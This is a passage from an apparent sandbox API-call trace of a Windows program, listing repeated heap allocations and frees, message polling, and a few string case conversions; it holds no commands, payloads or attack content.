0x34aa520 [0190.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0190.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.403] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0190.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0190.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0190.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.404] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.404] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0190.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.406] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.406] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0190.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0190.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0190.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0190.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa490 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0190.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.409] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0190.409] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.409] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0190.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0190.410] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.410] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0190.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0190.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0190.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0190.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0190.412] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0190.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0190.413] HeapFree 